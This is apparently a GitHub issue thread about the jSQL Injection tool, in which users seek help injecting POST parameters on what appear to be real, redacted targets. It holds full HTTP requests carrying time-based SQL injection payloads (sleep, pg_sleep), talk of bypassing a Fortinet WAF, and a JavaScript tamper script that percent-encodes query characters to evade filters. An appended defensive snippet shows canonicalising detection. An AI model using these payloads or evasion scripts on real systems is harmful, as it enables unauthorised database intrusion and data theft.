
can you make option parameter for support post request injection sql

Open selectfromblackhydra opened this issue 1 year ago • 8 comments

POST SQL injection needs a parameter to test SQL injection in a POST request, because if not, in my case the SQL injection does not inject or is a false positive. Can you add subquery SQL injection like sqlmap? Because in my case the injection is vuln with subquery injection boolean blind. Thank you.

selectfromblackhydra avatar Jan 20 '25 23:01 selectfromblackhydra

  • Sure, just deploy the advanced panel with the chevron on the right, then select radio for POST on the left:

Image

  • Can you be more specific with an error message or a detailed context?

Strategy Blind should work too, you can debug logs in tab Network to track the issue. You can also share the sqlmap option tag you are using if you are referring to a specific tag.

ron190 avatar Jan 21 '25 12:01 ron190

I mean, can you support POST like this?

POST /forgot_action.php HTTP/1.1
Host: redacted
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=>
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl>
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=fqn1cf8c9aoompe9brgkqr8jn9
Origin: redacted
Upgrade-Insecure-Requests: 1
Referer: redacted.>
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="130",>
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 21

ktp=BoSUhm'%2b(select*from(select(sleep(20)))a)%2b'&nik=BoSUh>

selectfromblackhydra avatar Jan 22 '25 00:01 selectfromblackhydra

This target is vuln but no WAF, but I have a problem: connection without the correct parameter, which is ktp in sqlmap; I don't know in jSQL.

selectfromblackhydra avatar Jan 22 '25 00:01 selectfromblackhydra

I know people use similar block templates, so I'll see if it's possible to integrate it properly, though in jSQL your template is equivalent to what is on the screenshot:

Image

  • Set the <url>/forgot_action.php in address bar
  • Select the POST radio
  • ⚠ 👉 Copy/paste the request parameters but reverse them to nik=&ktp= to inject ktp, or check option Inject every Request params in Preference 👈 ⚠
  • Copy/paste the block Host to Content-Length into header parameter, use the right button to open the modal

Also you may require a proper active session for Cookie: PHPSESSID=, depending on the service tested.

ron190 avatar Jan 22 '25 18:01 ron190

Hey ron, maybe you want to learn the sqlmap payloads. I have the file here:


selectfromblackhydra avatar Jan 25 '25 04:01 selectfromblackhydra

Can you make jSQL support my case? My injection needs a parameter; here is the photo. If not, jSQL cannot detect the injection because this is in multipart in POST. Thank you.

Image

Image

mrdragonblack avatar Feb 24 '25 04:02 mrdragonblack

Like, we should have an option to use a custom parameter, because my payload header is long. Just add an option to support a custom parameter, because many injections have a full POST payload like this:

agama=6&agama=6&alamat_kantor=23456&jabatan=123456&jns_klmin=0&kode_reg=123456&nama=123456&nama_user=admin%27%2F%2A%2A%2Fand%28select%271%27from%2F%2A%2A%2Fpg_sleep%280%29%29%3A%3Atext%3E%270&npwp=123456&pangkat=122&pangkat=122&password=KpNTNrZm&pendidikan=10&pendidikan=10&pilih_unitkerja=36&pilih_unitkerja=36&pilih_unitkerja=36&pilih_unitkerja=36&pwd1=pwd1&telpon_kantor=admin&telpon_rumah=admin&tempat_lahir=123456&tgl_lahir=2025-02-23&unit_kerja=admin

This is the full POST payload parameter.

selectfromblackhydra avatar Feb 24 '25 05:02 selectfromblackhydra

  • @selectfromblackhydra I reviewed the payloads you sent previously but no payload seems new, thanks anyway 👍

  • @mrdragonblack multipart should work with proper settings: select method POST, carefully set the boundary value, expand the textfield to correctly set the newline chars, and if needed set the star * where injection should work:

Request :
--boundary\nContent-Disposition: form-data; name="name"\n\n'*\n--boundary--
Header :
Content-Type: multipart/form-data;boundary=boundary

  • @selectfromblackhydra either set the star * at param nama_user=-1'*, or move param nama_user at the end of params list, or check Preference option Injection > URL parameters > Inject every Request parameters. Also expand the textfield to manage params easily.

ron190 avatar Feb 25 '25 18:02 ron190

Hey ron, can you add SQL obfuscation like A+N+D SLE/**/EP, random obfuscation, example 1AND1 OR 1A+N+D1 S+E+L+E+C+T SE//LE//C//T? I tested in Fortinet and it bypasses. And add like MySQL schema(), user(), current_user; for Oracle ora_database_name, user; for MSSQL db_id(), db_name(db_id()); for Postgres current_schema(), session_user, user as fallback if the common function of the SQL engine is blocked by the WAF. Can you add more SLEEP methods like MySQL, MSSQL, Oracle, Postgres sleep, AND OR XOR and more like sqlmap, and stack query and boolean? Can you add this? It would be great for your tool. Thank you.

selectfromblackhydra avatar Oct 04 '25 12:10 selectfromblackhydra

@selectfromblackhydra WAF bypass is often a manual task even when using other tools like sqlmap I guess.

In that regard you can define a custom script in Preferences to split every word and bypass WAF. Open Preferences > Tampering > Custom tamper and paste any JavaScript code to transform the query (shown in the code below). You can just customize or create your own method depending on your needs.

Here I used Copilot/ChatGPT to quickly create the method replaceCharWithURLEncoding(), pasted it in jSQL to test it and got the following result (e.g. MySQL):

Origin query: select 1,(select concat(0x53714c69,ifnull(mid((select group_concat(0x04,r,0x05,q,0x04...

Query transformed by tamper script: sel%65ct 1%2c%28sel%65ct conc%61t%280x%353714c69%2cifn%75ll%28...
Show code (copy/paste in Custom tamper, created by Copilot)
function replaceCharWithURLEncoding(str) {
  return str.split(/\b/).map(function(word) {
    // Only tokens made of word characters are touched; punctuation and spaces are kept as-is
    if (/^\w+$/.test(word)) {
      // Pick a random index anywhere in the word (first and last character included)
      var idx = Math.floor(Math.random() * word.length);
      var char = word[idx];
      // Percent-encode that single character, e.g. 'e' -> '%65'
      var encoded = '%' + char.charCodeAt(0).toString(16).toUpperCase();
      // Replace the character at idx with its encoded form
      return word.slice(0, idx) + encoded + word.slice(idx + 1);
    }
    return word;
  }).join('');
}

// Function jSQL's Custom tamper calls with the SQL query to transform before it is sent
var tampering = function(sql) {
  return replaceCharWithURLEncoding(sql);
}

Screenshot of working tamper script Image


A+N+D SLE/**/EP, random obfuscation, example 1AND1 OR 1A+N+D1 S+E+L+E+C+T SE//LE//C//T? I tested in Fortinet and it bypasses.

SQL statements like A+N+D SLE/**/EP SE//LE//C//T are not valid for SQL engines; I would need more feedback on the target SQL engine to test and add new obfuscation tampers. Or is this syntax replaced by the WAF?

In any case you can create a custom script matching your need, and I will add it when receiving more feedback from other users.


add like MySQL schema(), user(), current_user; for Oracle ora_database_name, user; for MSSQL db_id(), db_name(db_id()); for Postgres current_schema(), session_user, user as fallback if the common function of the SQL engine is blocked by the WAF

Fallback is possible though the easiest to do when blocked by WAF is the following :

  • either disable option Disable search of database name, version and user metadata in Preferences > Injection
  • or replace the forbidden keyword in SQL Engine > Structure > Metadata
Image

Can you add more SLEEP methods like MySQL, MSSQL, Oracle, Postgres sleep

The strategy that uses the sleep capability is already available as Time for those databases.

Can you share the missing SQL syntax you wanted to add ?


stack query and boolean, can you add this

Strategies stack and boolean are already available with the respective names :

  • Stack
  • Blind bin for boolean binary search
  • Blind bit for boolean bit query

Can you share the missing SQL syntax you wanted to add ?


AND OR XOR and more like SQLMAP and

Statements AND OR are already implemented (see in SQL Engine > Blind > AND OR Stack modes). I don't know the benefit of using XOR, I'll check what it's for.

Thanks for the feedback 👍

ron190 avatar Oct 04 '25 16:10 ron190
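Added example, not code from jSQL or from anyone in this thread: the defender-side counterpart of the replaceCharWithURLEncoding() tamper shown above. It demonstrates why a percent-encoded keyword such as sel%65ct slips past a filter that matches on the raw bytes while the database still receives select, and how canonicalising the value (decoding, including double-encoding) before matching closes that gap. The keyword list and sample values are constructed for this example.

```javascript
// Defender-side view of the tamper: a filter matching raw bytes misses
// "sel%65ct"; a filter that canonicalises first still sees "select".
// All sample inputs and the keyword list are constructed for this example.

const SQL_KEYWORDS = ["select", "union", "sleep", "concat", "and", "or"];

// Decode one layer of application/x-www-form-urlencoded data.
// Malformed %-sequences are left literally instead of throwing.
function decodeFormLayer(s) {
  return s
    .replace(/\+/g, " ")
    .replace(/%([0-9a-fA-F]{2})/g, (m, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Canonicalise: decode repeatedly (bounded) so a double-encoded letter such as
// "%2565" -> "%65" -> "e" is also undone, then lower-case for matching.
function canonicalize(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeFormLayer(cur);
    if (next === cur) break; // nothing left to decode
    cur = next;
  }
  return cur.toLowerCase();
}

// Naive filter: whole-word keyword match on the value as received.
// This is exactly what the percent-encoding tamper defeats.
function naiveMatch(raw) {
  const lower = raw.toLowerCase();
  return SQL_KEYWORDS.filter((k) => new RegExp("\\b" + k + "\\b").test(lower));
}

// Hardened filter: canonicalise first, then run the same match.
function canonicalMatch(raw) {
  return naiveMatch(canonicalize(raw));
}

// Constructed samples: the tamper's output shape from the comment above,
// a double-encoded variant, and a benign value containing an apostrophe.
const SAMPLES = {
  tampered: "sel%65ct 1%2c%28sel%65ct conc%61t%280x53714c69",
  doubleEncoded: "sel%2565ct%2Bfrom",
  benign: "John+O%27Brien",
};

// Returns, per sample, what each filter flags.
function report() {
  const out = {};
  for (const [name, val] of Object.entries(SAMPLES)) {
    out[name] = { naive: naiveMatch(val), canonical: canonicalMatch(val) };
  }
  return out;
}

console.log(JSON.stringify(report(), null, 2));
```

The benign value shows the other half of the trade-off: canonicalising must not turn a legitimate apostrophe into a match, so the matching stays on whole keywords rather than on quote characters.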